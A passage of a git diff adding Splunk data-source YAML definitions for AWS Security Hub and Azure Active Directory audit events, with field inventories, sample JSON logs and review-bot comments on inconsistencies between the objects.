- - Resources{}.Tags.GeneratedFindingInstaceTag4
- - Resources{}.Tags.GeneratedFindingInstaceTag5
- - Resources{}.Tags.GeneratedFindingInstaceTag6
- - Resources{}.Tags.GeneratedFindingInstaceTag7
- - Resources{}.Tags.GeneratedFindingInstaceTag8
- - Resources{}.Tags.GeneratedFindingInstaceTag9
- - Resources{}.Tags.foo
- - Resources{}.Type
- - SchemaVersion
- - Severity.Label
- - Severity.Normalized
- - Severity.Product
- - SourceUrl
- - Title
- - Types{}
- - UpdatedAt
- - Workflow.Status
- - WorkflowState
- - accesskey_extract
- - app
- - body
- - description
- - dest
- - dest_type
- - eventtype
- - host
- - id
- - index
- - instance_extract
- - linecount
- - punct
- - s3bucket_extract
- - severity
- - severity_id
- - signature
- - signature_id
- - source
- - sourcetype
- - splunk_server
- - subject
- - tag
- - tag::eventtype
- - timestamp
- - type
- - vendor_account
- - vendor_region
-example_log:
- '{"ProductArn":"arn:aws:securityhub:us-east-1::product/aws/guardduty","Types":["Software
+- _time
+- AwsAccountId
+- CreatedAt
+- Description
+- FirstObservedAt
+- GeneratorId
+- Id
+- LastObservedAt
+- ProductArn
+- ProductFields.aws/guardduty/service/action/actionType
+- ProductFields.aws/guardduty/service/action/awsApiCallAction/affectedResources/AWS::S3::Bucket
+- ProductFields.aws/guardduty/service/action/awsApiCallAction/api
+- ProductFields.aws/guardduty/service/action/awsApiCallAction/callerType
+- ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/city/cityName
+- ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/country/countryName
+- ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/geoLocation/lat
+- ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/geoLocation/lon
+- ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/ipAddressV4
+- ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/organization/asn
+- ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/organization/asnOrg
+- ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/organization/isp
+- ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/organization/org
+- ProductFields.aws/guardduty/service/action/awsApiCallAction/serviceName
+- ProductFields.aws/guardduty/service/additionalInfo/sample
+- ProductFields.aws/guardduty/service/additionalInfo/unusual/hoursOfDay.0_
+- ProductFields.aws/guardduty/service/additionalInfo/unusual/userNames.0_
+- ProductFields.aws/guardduty/service/archived
+- ProductFields.aws/guardduty/service/count
+- ProductFields.aws/guardduty/service/detectorId
+- ProductFields.aws/guardduty/service/eventFirstSeen
+- ProductFields.aws/guardduty/service/eventLastSeen
+- ProductFields.aws/guardduty/service/resourceRole
+- ProductFields.aws/guardduty/service/serviceName
+- ProductFields.aws/securityhub/CompanyName
+- ProductFields.aws/securityhub/FindingId
+- ProductFields.aws/securityhub/ProductName
+- RecordState
+- Resources{}.Details.AwsEc2Instance.IamInstanceProfileArn
+- Resources{}.Details.AwsEc2Instance.ImageId
+- Resources{}.Details.AwsEc2Instance.IpV4Addresses{}
+- Resources{}.Details.AwsEc2Instance.LaunchedAt
+- Resources{}.Details.AwsEc2Instance.SubnetId
+- Resources{}.Details.AwsEc2Instance.Type
+- Resources{}.Details.AwsEc2Instance.VpcId
+- Resources{}.Details.AwsIamAccessKey.PrincipalId
+- Resources{}.Details.AwsIamAccessKey.PrincipalName
+- Resources{}.Details.AwsIamAccessKey.PrincipalType
+- Resources{}.Details.AwsS3Bucket.CreatedAt
+- Resources{}.Details.AwsS3Bucket.OwnerId
+- Resources{}.Details.AwsS3Bucket.ServerSideEncryptionConfiguration.Rules{}.ApplyServerSideEncryptionByDefault.KMSMasterKeyID
+- Resources{}.Details.AwsS3Bucket.ServerSideEncryptionConfiguration.Rules{}.ApplyServerSideEncryptionByDefault.SSEAlgorithm
+- Resources{}.Id
+- Resources{}.Partition
+- Resources{}.Region
+- Resources{}.Tags.GeneratedFindingInstaceTag1
+- Resources{}.Tags.GeneratedFindingInstaceTag2
+- Resources{}.Tags.GeneratedFindingInstaceTag3
+- Resources{}.Tags.GeneratedFindingInstaceTag4
+- Resources{}.Tags.GeneratedFindingInstaceTag5
+- Resources{}.Tags.GeneratedFindingInstaceTag6
+- Resources{}.Tags.GeneratedFindingInstaceTag7
+- Resources{}.Tags.GeneratedFindingInstaceTag8
+- Resources{}.Tags.GeneratedFindingInstaceTag9
+- Resources{}.Tags.foo
+- Resources{}.Type
+- SchemaVersion
+- Severity.Label
+- Severity.Normalized
+- Severity.Product
+- SourceUrl
+- Title
+- Types{}
+- UpdatedAt
+- Workflow.Status
+- WorkflowState
+- accesskey_extract
+- app
+- body
+- description
+- dest
+- dest_type
+- eventtype
+- host
+- id
+- index
+- instance_extract
+- linecount
+- punct
+- s3bucket_extract
+- severity
+- severity_id
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- subject
+- tag
+- tag::eventtype
+- timestamp
+- type
+- vendor_account
+- vendor_region
+example_log: '{"ProductArn":"arn:aws:securityhub:us-east-1::product/aws/guardduty","Types":["Software
and Configuration Checks/Exfiltration:S3.ObjectRead.Unusual"],"SourceUrl":"https://us-east-1.console.aws.amazon.com/guardduty/home?region=us-east-1#/findings?macros=current&fId=6aba6b696aea10606e8b336f68d98819","Description":"Principal
GeneratedFindingUserName read objects from S3 bucket GeneratedFindingS3Bucket in
an unusual way.","SchemaVersion":"2018-10-08","GeneratorId":"arn:aws:guardduty:us-east-1:802684071507:detector/48ba636359b884eb132865311fdeb317","FirstObservedAt":"2020-09-28T22:26:15.636Z","CreatedAt":"2020-09-28T22:26:15.636Z","RecordState":"ACTIVE","Title":"Unusual
diff --git a/data_sources/azure_active_directory.yml b/data_sources/azure_active_directory.yml
new file mode 100644
index 0000000000..c7e338765b
--- /dev/null
+++ b/data_sources/azure_active_directory.yml
@@ -0,0 +1,13 @@
+name: Azure Active Directory
+id: 51ca21e5-bda2-4652-bb29-27c7bc18a81c
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Azure Active Directory
+source: Azure AD
+sourcetype: azure:monitor:aad
+separator: operationName
+supported_TA:
+- name: Splunk Add-on for Microsoft Cloud Services
+ url: https://splunkbase.splunk.com/app/3110
+ version: 5.2.2
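Review bot: This parent object declares neither `fields:` nor `example_log:`, whereas every per-event data-source object in this commit carries both, so a reader cannot tell whether the omission is intentional. If the schema treats them as optional for a container whose events are split by `separator: operationName`, a one-line comment after that key, `# fields/example_log are defined on the per-operationName objects`, records the intent and stops a later contributor from "fixing" it; if they are required, this object will fail validation when the content build loads it. The sibling `aws_security_hub.yml` object in this commit does carry both keys, which makes the difference worth stating explicitly.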
diff --git a/data_sources/azure_active_directory_add_app_role_assignment_to_service_principal.yml b/data_sources/azure_active_directory_add_app_role_assignment_to_service_principal.yml
new file mode 100644
index 0000000000..a0a468ad65
--- /dev/null
+++ b/data_sources/azure_active_directory_add_app_role_assignment_to_service_principal.yml
@@ -0,0 +1,120 @@
+name: Azure Active Directory Add app role assignment to service principal
+id: 8b2e84cd-6db0-47e9-badc-75c17df1995f
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Azure Active Directory Add app role assignment
+ to service principal
+source: Azure AD
+sourcetype: azure:monitor:aad
+separator: operationName
+supported_TA:
+- name: Splunk Add-on for Microsoft Cloud Services
+ url: https://splunkbase.splunk.com/app/3110
+ version: 5.2.2
+fields:
+- _time
+- Level
+- additional_details
+- additional_details_name
+- additional_details_value
+- category
+- command
+- correlationId
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dest_type
+- durationMs
+- dvc
+- eventtype
+- host
+- id
+- identity
+- index
+- linecount
+- object_attrs
+- object_id
+- operationName
+- operationVersion
+- path_from_resourceId
+- properties.activityDateTime
+- properties.activityDisplayName
+- properties.additionalDetails{}.key
+- properties.additionalDetails{}.value
+- properties.category
+- properties.correlationId
+- properties.id
+- properties.initiatedBy.app.appId
+- properties.initiatedBy.app.displayName
+- properties.initiatedBy.app.servicePrincipalId
+- properties.initiatedBy.app.servicePrincipalName
+- properties.loggedByService
+- properties.operationType
+- properties.result
+- properties.resultReason
+- properties.targetResources{}.displayName
+- properties.targetResources{}.id
+- properties.targetResources{}.modifiedProperties{}.displayName
+- properties.targetResources{}.modifiedProperties{}.newValue
+- properties.targetResources{}.modifiedProperties{}.oldValue
+- properties.targetResources{}.type
+- properties.userAgent
+- punct
+- resourceId
+- result
+- resultSignature
+- result_id
+- signature
+- source
+- sourcetype
+- splunk_server
+- src_user_type
+- status
+- tag
+- tag::eventtype
+- tenantId
+- time
+- timeendpos
+- timestartpos
+- user_agent
+- user_type
+- vendor_account
+- vendor_product
+example_log: '{"time": "2024-02-08T21:49:53.7643129Z", "resourceId": "/tenants/75243ab2-44f8-435c-a7a6-b479385df6d4/providers/Microsoft.aadiam",
+ "operationName": "Add app role assignment to service principal", "operationVersion":
+ "1.0", "category": "AuditLogs", "tenantId": "75243ab2-44f8-435c-a7a6-b479385df6d4",
+ "resultSignature": "None", "durationMs": 0, "correlationId": "ed53faec-49b5-444f-b6af-b928558ca433",
+ "identity": "LegacyTestOAuthApp", "Level": 4, "properties": {"id": "Directory_ed53faec-49b5-444f-b6af-b928558ca433_XH34Q_29215277",
+ "category": "ApplicationManagement", "correlationId": "ed53faec-49b5-444f-b6af-b928558ca433",
+ "result": "success", "resultReason": "", "activityDisplayName": "Add app role assignment
+ to service principal", "activityDateTime": "2024-02-08T21:49:53.7643129+00:00",
+ "loggedByService": "Core Directory", "operationType": "Assign", "userAgent": null,
+ "initiatedBy": {"app": {"appId": null, "displayName": "LegacyTestOAuthApp", "servicePrincipalId":
+ "fc8c8125-bc0c-499d-8344-e53c6e3caa81", "servicePrincipalName": null}}, "targetResources":
+ [{"id": "8429eb5c-faeb-4ade-8eac-acc003790769", "displayName": "Office 365 Exchange
+ Online", "type": "ServicePrincipal", "modifiedProperties": [{"displayName": "AppRole.Id",
+ "oldValue": null, "newValue": "\"dc890d15-9560-4a4c-9b7f-a736ec74ec40\""}, {"displayName":
+ "AppRole.Value", "oldValue": null, "newValue": "\"full_access_as_app\""}, {"displayName":
+ "AppRole.DisplayName", "oldValue": null, "newValue": "\"Use Exchange Web Services
+ with full access to all mailboxes\""}, {"displayName": "AppRoleAssignment.CreatedDateTime",
+ "oldValue": null, "newValue": "\"2024-02-08T21:49:53.6813076Z\""}, {"displayName":
+ "AppRoleAssignment.LastModifiedDateTime", "oldValue": null, "newValue": "\"2024-02-08T21:49:53.6813076Z\""},
+ {"displayName": "ServicePrincipal.ObjectID", "oldValue": null, "newValue": "\"2e5c2fd0-cca4-452c-9891-a07c0dafd964\""},
+ {"displayName": "ServicePrincipal.DisplayName", "oldValue": null, "newValue": "\"STRT_Oauth\""},
+ {"displayName": "ServicePrincipal.AppId", "oldValue": null, "newValue": "\"5f91ce94-4cc5-4ebe-aeb6-f074e57201bb\""},
+ {"displayName": "ServicePrincipal.Name", "oldValue": null, "newValue": "\"5f91ce94-4cc5-4ebe-aeb6-f074e57201bb\""},
+ {"displayName": "TargetId.ServicePrincipalNames", "oldValue": null, "newValue":
+ "\"https://outlook.office.com;Microsoft.Exchange;00000002-0000-0ff1-ce00-000000000000;00000002-0000-0ff1-ce00-000000000000/*.outlook.com;00000002-0000-0ff1-ce00-000000000000/outlook.com;00000002-0000-0ff1-ce00-000000000000/mail.office365.com;00000002-0000-0ff1-ce00-000000000000/outlook.office365.com;https://webmail.apps.mil/;https://ps.protection.outlook.com/;https://outlook-dod.office365.us/;https://outlook.com/;https://outlook.office365.com/;https://outlook.office.com/;https://outlook.office365.com:443/;https://outlook-sdf.office365.com/;https://outlook-sdf.office.com/;https://outlook.office365.us/;https://autodiscover-s.office365.us/;https://ps.compliance.protection.outlook.com;https://manage.protection.apps.mil;https://outlook-tdf.office.com/;https://outlook-tdf-2.office.com/;https://ps.outlook.com\""}],
+ "administrativeUnits": []}, {"id": "2e5c2fd0-cca4-452c-9891-a07c0dafd964", "displayName":
+ "5f91ce94-4cc5-4ebe-aeb6-f074e57201bb", "type": "ServicePrincipal", "modifiedProperties":
+ [], "administrativeUnits": []}], "additionalDetails": [{"key": "User-Agent", "value":
+ "Mozilla/5.0 (Macintosh; Darwin 23.3.0 Darwin Kernel Version 23.3.0: Wed Dec 20
+ 21:28:58 PST 2023; root:xnu-10002.81.5~7/RELEASE_X86_64; en-US) PowerShell/7.3.4"},
+ {"key": "AppId", "value": "00000002-0000-0ff1-ce00-000000000000"}]}}'
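Review bot: The field inventory here is the only Azure AD one in this commit with `properties.initiatedBy.app.*` and without `callerIpAddress` or `properties.initiatedBy.user.*`, which follows from the single sample being initiated by an application (`"initiatedBy": {"app": ...}`) rather than a user. Presumably the same `operationName` can also be produced by an interactive admin, in which case the `initiatedBy.user` fields would appear and the `app` ones would not; a detection that derives its actor solely from `properties.initiatedBy.app.displayName` would then see an empty actor. Worth recording above `fields:`, e.g. `# inventory derived from an app-initiated sample; user-initiated events carry properties.initiatedBy.user.* instead`, so the inventory is not read as exhaustive.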
diff --git a/data_sources/azure_active_directory_add_member_to_role.yml b/data_sources/azure_active_directory_add_member_to_role.yml
new file mode 100644
index 0000000000..ae7be77cc6
--- /dev/null
+++ b/data_sources/azure_active_directory_add_member_to_role.yml
@@ -0,0 +1,85 @@
+name: Azure Active Directory Add member to role
+id: 1660d196-127f-4678-81b2-472d51711b07
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Azure Active Directory Add member to role
+source: Azure AD
+sourcetype: azure:monitor:aad
+separator: operationName
+supported_TA:
+- name: Splunk Add-on for Microsoft Cloud Services
+ url: https://splunkbase.splunk.com/app/3110
+ version: 5.2.2
+fields:
+- _time
+- Level
+- callerIpAddress
+- category
+- correlationId
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- durationMs
+- host
+- index
+- linecount
+- operationName
+- operationVersion
+- properties.activityDateTime
+- properties.activityDisplayName
+- properties.category
+- properties.correlationId
+- properties.id
+- properties.initiatedBy.user.displayName
+- properties.initiatedBy.user.id
+- properties.initiatedBy.user.ipAddress
+- properties.initiatedBy.user.userPrincipalName
+- properties.loggedByService
+- properties.operationType
+- properties.result
+- properties.resultReason
+- properties.targetResources{}.displayName
+- properties.targetResources{}.id
+- properties.targetResources{}.modifiedProperties{}.displayName
+- properties.targetResources{}.modifiedProperties{}.newValue
+- properties.targetResources{}.modifiedProperties{}.oldValue
+- properties.targetResources{}.type
+- properties.targetResources{}.userPrincipalName
+- properties.userAgent
+- punct
+- resourceId
+- resultSignature
+- source
+- sourcetype
+- splunk_server
+- tenantId
+- time
+- timeendpos
+- timestartpos
+example_log: '{"time": "2023-04-28T16:39:51.9312625Z", "resourceId": "/tenants/fc69e276-e9e8-4af9-9002-1e410d77244e/providers/Microsoft.aadiam",
+ "operationName": "Add member to role", "operationVersion": "1.0", "category": "AuditLogs",
+ "tenantId": "fc69e276-e9e8-4af9-9002-1e410d77244e", "resultSignature": "None", "durationMs":
+ 0, "callerIpAddress": "52.177.250.168", "correlationId": "b425f2d7-2245-4952-b599-61dff8054f2b",
+ "Level": 4, "properties": {"id": "Directory_b425f2d7-2245-4952-b599-61dff8054f2b_FLAW0_72812697",
+ "category": "RoleManagement", "correlationId": "b425f2d7-2245-4952-b599-61dff8054f2b",
+ "result": "success", "resultReason": "", "activityDisplayName": "Add member to role",
+ "activityDateTime": "2023-04-28T16:39:51.9312625+00:00", "loggedByService": "Core
+ Directory", "operationType": "Assign", "userAgent": null, "initiatedBy": {"user":
+ {"id": "3bd47e42-37c9-442f-a2b4-f04de61ef0ce", "displayName": null, "userPrincipalName":
+ "strt_admin@splunkresearch.com", "ipAddress": "52.177.250.168", "roles": []}}, "targetResources":
+ [{"id": "0d664d57-a3ee-4049-8642-280a5c7243ef", "displayName": null, "type": "User",
+ "userPrincipalName": "User1@splunkresearch.com", "modifiedProperties": [{"displayName":
+ "Role.ObjectID", "oldValue": null, "newValue": "\"38bf5baf-7ec7-4bc2-8920-6d4044da12c2\""},
+ {"displayName": "Role.DisplayName", "oldValue": null, "newValue": "\"Privileged
+ Role Administrator\""}, {"displayName": "Role.TemplateId", "oldValue": null, "newValue":
+ "\"9b895d92-2cd3-44c7-9d02-a6ac2d5ea5c3\""}, {"displayName": "Role.WellKnownObjectName",
+ "oldValue": null, "newValue": "\"ApplicationAdministrators\""}], "administrativeUnits":
+ []}, {"id": "38bf5baf-7ec7-4bc2-8920-6d4044da12c2", "displayName": null, "type":
+ "Role", "modifiedProperties": [], "administrativeUnits": []}], "additionalDetails":
+ []}}'
diff --git a/data_sources/azure_active_directory_add_owner_to_application.yml b/data_sources/azure_active_directory_add_owner_to_application.yml
new file mode 100644
index 0000000000..fb86357ca7
--- /dev/null
+++ b/data_sources/azure_active_directory_add_owner_to_application.yml
@@ -0,0 +1,90 @@
+name: Azure Active Directory Add owner to application
+id: e895ed56-7be4-4b3a-b782-ecd0f594ec4c
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Azure Active Directory Add owner to application
+source: Azure AD
+sourcetype: azure:monitor:aad
+separator: operationName
+supported_TA:
+- name: Splunk Add-on for Microsoft Cloud Services
+ url: https://splunkbase.splunk.com/app/3110
+ version: 5.2.2
+fields:
+- _time
+- Level
+- callerIpAddress
+- category
+- correlationId
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- durationMs
+- eventtype
+- host
+- index
+- linecount
+- operationName
+- operationVersion
+- properties.activityDateTime
+- properties.activityDisplayName
+- properties.additionalDetails{}.key
+- properties.additionalDetails{}.value
+- properties.category
+- properties.correlationId
+- properties.id
+- properties.initiatedBy.user.displayName
+- properties.initiatedBy.user.id
+- properties.initiatedBy.user.ipAddress
+- properties.initiatedBy.user.userPrincipalName
+- properties.loggedByService
+- properties.operationType
+- properties.result
+- properties.resultReason
+- properties.targetResources{}.displayName
+- properties.targetResources{}.id
+- properties.targetResources{}.modifiedProperties{}.displayName
+- properties.targetResources{}.modifiedProperties{}.newValue
+- properties.targetResources{}.modifiedProperties{}.oldValue
+- properties.targetResources{}.type
+- properties.targetResources{}.userPrincipalName
+- properties.userAgent
+- punct
+- resourceId
+- resultSignature
+- source
+- sourcetype
+- splunk_server
+- tag
+- tag::eventtype
+- tenantId
+- time
+- timeendpos
+- timestartpos
+example_log: '{"time": "2023-06-20T15:54:13.2420879Z", "resourceId": "/tenants/fc69e276-e9e8-4af9-9002-1e410d77244e/providers/Microsoft.aadiam",
+ "operationName": "Add owner to application", "operationVersion": "1.0", "category":
+ "AuditLogs", "tenantId": "fc69e276-e9e8-4af9-9002-1e410d77244e", "resultSignature":
+ "None", "durationMs": 0, "callerIpAddress": "20.190.135.43", "correlationId": "231de5d4-2156-433a-8163-48956bdaa040",
+ "Level": 4, "properties": {"id": "Directory_231de5d4-2156-433a-8163-48956bdaa040_C21RW_365283677",
+ "category": "ApplicationManagement", "correlationId": "231de5d4-2156-433a-8163-48956bdaa040",
+ "result": "success", "resultReason": "", "activityDisplayName": "Add owner to application",
+ "activityDateTime": "2023-06-20T15:54:13.2420879+00:00", "loggedByService": "Core
+ Directory", "operationType": "Assign", "userAgent": null, "initiatedBy": {"user":
+ {"id": "4d3f1865-b395-4430-91dc-1b9dd337712e", "displayName": null, "userPrincipalName":
+ "globaladmin@splunkresearch.com", "ipAddress": "20.190.135.43", "roles": []}}, "targetResources":
+ [{"id": "dd92f1af-43d7-47d9-b93c-a78c6b635180", "displayName": null, "type": "User",
+ "userPrincipalName": "Abigail.Clark@splunkresearch.com", "modifiedProperties": [{"displayName":
+ "Application.ObjectID", "oldValue": null, "newValue": "\"bb2479d8-5e89-4480-bb7e-3178d5a5d469\""},
+ {"displayName": "Application.DisplayName", "oldValue": null, "newValue": "\"CloudForge\""},
+ {"displayName": "Application.AppId", "oldValue": null, "newValue": "\"f0748f3d-45f2-4e2e-a4e1-f2e2b5271bdf\""}],
+ "administrativeUnits": []}, {"id": "bb2479d8-5e89-4480-bb7e-3178d5a5d469", "displayName":
+ null, "type": "Application", "modifiedProperties": [], "administrativeUnits": []}],
+ "additionalDetails": [{"key": "User-Agent", "value": "Mozilla/5.0 (Macintosh; Darwin
+ 22.4.0 Darwin Kernel Version 22.4.0: Mon Mar 6 21:00:17 PST 2023; root:xnu-8796.101.5~3/RELEASE_X86_64;
+ en-US) PowerShell/7.3.4"}]}}'
diff --git a/data_sources/azure_active_directory_add_service_principal.yml b/data_sources/azure_active_directory_add_service_principal.yml
new file mode 100644
index 0000000000..c0a5ff1085
--- /dev/null
+++ b/data_sources/azure_active_directory_add_service_principal.yml
@@ -0,0 +1,88 @@
+name: Azure Active Directory Add service principal
+id: fd89d337-e4c0-4162-ad13-bca36f096fe6
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Azure Active Directory Add service principal
+source: Azure AD
+sourcetype: azure:monitor:aad
+separator: operationName
+supported_TA:
+- name: Splunk Add-on for Microsoft Cloud Services
+ url: https://splunkbase.splunk.com/app/3110
+ version: 5.2.2
+fields:
+- _time
+- Level
+- category
+- correlationId
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- durationMs
+- host
+- index
+- linecount
+- operationName
+- operationVersion
+- properties.activityDateTime
+- properties.activityDisplayName
+- properties.additionalDetails{}.key
+- properties.additionalDetails{}.value
+- properties.category
+- properties.correlationId
+- properties.id
+- properties.initiatedBy.user.displayName
+- properties.initiatedBy.user.id
+- properties.initiatedBy.user.ipAddress
+- properties.initiatedBy.user.userPrincipalName
+- properties.loggedByService
+- properties.operationType
+- properties.result
+- properties.resultReason
+- properties.targetResources{}.displayName
+- properties.targetResources{}.id
+- properties.targetResources{}.modifiedProperties{}.displayName
+- properties.targetResources{}.modifiedProperties{}.newValue
+- properties.targetResources{}.modifiedProperties{}.oldValue
+- properties.targetResources{}.type
+- properties.userAgent
+- punct
+- resourceId
+- resultSignature
+- source
+- sourcetype
+- splunk_server
+- tenantId
+- time
+- timeendpos
+- timestartpos
+example_log: '{"time": "2024-02-07T22:31:14.4970418Z", "resourceId": "/tenants/a417c578-c7ee-480d-a225-d48057e74df5/providers/Microsoft.aadiam",
+ "operationName": "Add service principal", "operationVersion": "1.0", "category":
+ "AuditLogs", "tenantId": "a417c578-c7ee-480d-a225-d48057e74df5", "resultSignature":
+ "None", "durationMs": 0, "correlationId": "ea473f15-64b3-435a-a885-6ee3908919e2",
+ "Level": 4, "properties": {"id": "Directory_ea473f15-64b3-435a-a885-6ee3908919e2_GSOLK_21152854",
+ "category": "ApplicationManagement", "correlationId": "ea473f15-64b3-435a-a885-6ee3908919e2",
+ "result": "success", "resultReason": "", "activityDisplayName": "Add service principal",
+ "activityDateTime": "2024-02-07T22:31:14.4970418+00:00", "loggedByService": "Core
+ Directory", "operationType": "Add", "userAgent": null, "initiatedBy": {"user": {"id":
+ "e4c722ac-3b83-478d-8f52-c388885dc30f", "displayName": null, "userPrincipalName":
+ "Herman@phantomengineering.onmicrosoft.com", "ipAddress": "", "roles": []}}, "targetResources":
+ [{"id": "2dedf863-ac93-4f45-87b3-e32f48145380", "displayName": "Malicious11", "type":
+ "ServicePrincipal", "modifiedProperties": [{"displayName": "AccountEnabled", "oldValue":
+ "[]", "newValue": "[true]"}, {"displayName": "AppPrincipalId", "oldValue": "[]",
+ "newValue": "[\"e06366ca-8489-4748-b6a2-d7e4332f45c1\"]"}, {"displayName": "DisplayName",
+ "oldValue": "[]", "newValue": "[\"Malicious11\"]"}, {"displayName": "ServicePrincipalName",
+ "oldValue": "[]", "newValue": "[\"e06366ca-8489-4748-b6a2-d7e4332f45c1\"]"}, {"displayName":
+ "Credential", "oldValue": "[]", "newValue": "[{\"CredentialType\":2,\"KeyStoreId\":\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\",\"KeyGroupId\":\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\"}]"},
+ {"displayName": "Included Updated Properties", "oldValue": null, "newValue": "\"AccountEnabled,
+ AppPrincipalId, DisplayName, ServicePrincipalName, Credential\""}, {"displayName":
+ "TargetId.ServicePrincipalNames", "oldValue": null, "newValue": "\"e06366ca-8489-4748-b6a2-d7e4332f45c1\""}],
+ "administrativeUnits": []}], "additionalDetails": [{"key": "User-Agent", "value":
+ "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like
+ Gecko) Chrome/121.0.0.0 Safari/537.36"}, {"key": "AppId", "value": "e06366ca-8489-4748-b6a2-d7e4332f45c1"}]}}'
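Review bot: `callerIpAddress` is missing from this field list, and `properties.initiatedBy.user.ipAddress` is `""` in the sample, although sibling objects for the same `sourcetype: azure:monitor:aad` (add member to role, add owner to application) list `callerIpAddress` and carry a populated address; the same gap is in the Disable Strong Authentication object later in this commit. If the inventory is used to validate which fields a detection may reference, a rule that pivots on source address for this operation would be flagged as using an unknown field even though the sourcetype does emit it. Either add `- callerIpAddress` to both lists or note above `fields:` that the inventory reflects one sample in which the address was not populated.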
diff --git a/data_sources/azure_active_directory_add_unverified_domain.yml b/data_sources/azure_active_directory_add_unverified_domain.yml
new file mode 100644
index 0000000000..f25e92be67
--- /dev/null
+++ b/data_sources/azure_active_directory_add_unverified_domain.yml
@@ -0,0 +1,83 @@
+name: Azure Active Directory Add unverified domain
+id: d4c01fb1-3b88-46d3-bd12-9b9e256450f7
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Azure Active Directory Add unverified domain
+source: Azure AD
+sourcetype: azure:monitor:aad
+separator: operationName
+supported_TA:
+- name: Splunk Add-on for Microsoft Cloud Services
+ url: https://splunkbase.splunk.com/app/3110
+ version: 5.2.2
+fields:
+- _time
+- Level
+- callerIpAddress
+- category
+- correlationId
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- durationMs
+- host
+- index
+- linecount
+- operationName
+- operationVersion
+- properties.activityDateTime
+- properties.activityDisplayName
+- properties.additionalDetails{}.key
+- properties.additionalDetails{}.value
+- properties.category
+- properties.correlationId
+- properties.id
+- properties.initiatedBy.user.displayName
+- properties.initiatedBy.user.id
+- properties.initiatedBy.user.ipAddress
+- properties.initiatedBy.user.userPrincipalName
+- properties.loggedByService
+- properties.operationType
+- properties.result
+- properties.resultReason
+- properties.targetResources{}.displayName
+- properties.targetResources{}.id
+- properties.targetResources{}.modifiedProperties{}.displayName
+- properties.targetResources{}.modifiedProperties{}.newValue
+- properties.targetResources{}.modifiedProperties{}.oldValue
+- properties.userAgent
+- punct
+- resourceId
+- resultSignature
+- source
+- sourcetype
+- splunk_server
+- tenantId
+- time
+- timeendpos
+- timestartpos
+example_log: '{"time": "2023-07-26T13:45:54.1582053Z", "resourceId": "/tenants/fc69e276-e9e8-4af9-9002-1e410d77244e/providers/Microsoft.aadiam",
+ "operationName": "Add unverified domain", "operationVersion": "1.0", "category":
+ "AuditLogs", "tenantId": "fc69e276-e9e8-4af9-9002-1e410d77244e", "resultSignature":
+ "None", "durationMs": 0, "callerIpAddress": "2601:646:a000:200:6419:f55c:946d:17d1",
+ "correlationId": "bdab88f3-69a4-4e66-883d-5b1e1558e61b", "Level": 4, "properties":
+ {"id": "Directory_bdab88f3-69a4-4e66-883d-5b1e1558e61b_311NT_82497138", "category":
+ "DirectoryManagement", "correlationId": "bdab88f3-69a4-4e66-883d-5b1e1558e61b",
+ "result": "success", "resultReason": "", "activityDisplayName": "Add unverified
+ domain", "activityDateTime": "2023-07-26T13:45:54.1582053+00:00", "loggedByService":
+ "Core Directory", "operationType": "Add", "userAgent": null, "initiatedBy": {"user":
+ {"id": "728989f4-eb3d-45c2-8741-2f2af4e485ce", "displayName": null, "userPrincipalName":
+ "tommyr@splunkresearch.com", "ipAddress": "2601:646:a000:200:6419:f55c:946d:17d1",
+ "roles": []}}, "targetResources": [{"id": null, "displayName": "newdomain.com",
+ "modifiedProperties": [{"displayName": "Name", "oldValue": "[\"\"]", "newValue":
+ "[\"newdomain.com\"]"}, {"displayName": "LiveType", "oldValue": "[\"None\"]", "newValue":
+ "[\"Managed\"]"}, {"displayName": "Included Updated Properties", "oldValue": null,
+ "newValue": "\"Name,LiveType\""}], "administrativeUnits": []}], "additionalDetails":
+ [{"key": "User-Agent", "value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)
+ AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"}]}}'
diff --git a/data_sources/azure_active_directory_consent_to_application.yml b/data_sources/azure_active_directory_consent_to_application.yml
new file mode 100644
index 0000000000..e8015f8161
--- /dev/null
+++ b/data_sources/azure_active_directory_consent_to_application.yml
@@ -0,0 +1,98 @@
+name: Azure Active Directory Consent to application
+id: 4c5d6c49-53e3-4980-a4de-c63e26291ed0
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Azure Active Directory Consent to application
+source: Azure AD
+sourcetype: azure:monitor:aad
+separator: operationName
+supported_TA:
+- name: Splunk Add-on for Microsoft Cloud Services
+ url: https://splunkbase.splunk.com/app/3110
+ version: 5.2.2
+fields:
+- _time
+- Level
+- callerIpAddress
+- category
+- correlationId
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- durationMs
+- eventtype
+- host
+- index
+- linecount
+- operationName
+- operationVersion
